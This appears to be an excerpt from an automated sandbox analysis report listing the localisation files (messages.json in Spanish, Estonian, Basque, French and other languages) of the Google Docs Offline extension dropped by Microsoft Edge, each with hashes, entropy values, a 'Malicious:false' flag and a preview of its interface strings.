                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                          Download File
